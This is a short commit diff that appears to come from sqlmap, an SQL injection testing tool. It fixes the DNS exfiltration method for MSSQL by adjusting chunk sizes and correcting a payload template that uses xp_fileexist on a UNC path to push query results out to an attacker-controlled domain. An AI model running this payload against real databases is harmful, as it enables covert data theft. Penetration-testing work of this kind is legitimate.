fix for DNS method for MSSQL

2024-11-22 17:46:37 +03:00 · 2012-04-02 17:28:18 +00:00 · 2012-04-02 17:28:18 +00:00 · 5f94987b0f
commit 5f94987b0f
parent 2c28423cb8
2 changed files with 2 additions and 7 deletions
--- a/lib/techniques/dns/use.py
+++ b/lib/techniques/dns/use.py
@ -57,12 +57,11 @@ def dnsUse(payload, expression):

        if output is None:
            kb.dnsMode = True
-            pushValue(kb.technique)

            while True:
                count += 1
                prefix, suffix = ("%s" % randomStr(3) for _ in xrange(2))
-                chunk_length = MAX_DNS_LABEL / 2
+                chunk_length = MAX_DNS_LABEL / 2 if Backend.isDbms(DBMS.ORACLE) else MAX_DNS_LABEL / 4 - 2
                _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression)
                nulledCastedField = agent.nullAndCastField(fieldToCastStr)
                nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length)
@ -74,9 +73,6 @@ def dnsUse(payload, expression):


                if Backend.isDbms(DBMS.MSSQL):
-                    kb.technique = PAYLOAD.TECHNIQUE.STACKED
-                    expression = cleanQuery(expression)
-
                    comment = queries[Backend.getIdentifiedDbms()].comment.query
                    query = agent.prefixQuery("; %s" % expressionUnescaped)
                    query = agent.suffixQuery("%s;%s" % (query, comment))
@ -96,7 +92,6 @@ def dnsUse(payload, expression):
                else:
                    break

-            kb.technique = popValue()
            kb.dnsMode = False

        if output is not None:
--- a/procs/mssqlserver/dns_request.txt
+++ b/procs/mssqlserver/dns_request.txt
@ -1,3 +1,3 @@
 DECLARE @host varchar(1024);
 SELECT @host = '%PREFIX%.' + (%QUERY%) + '.%SUFFIX%' + '.%DOMAIN%';
-EXEC('xp_fileexist "\' + @host + 'c$boot.ini"');
+EXEC('xp_fileexist "\\' + @host + '\c$boot.ini"');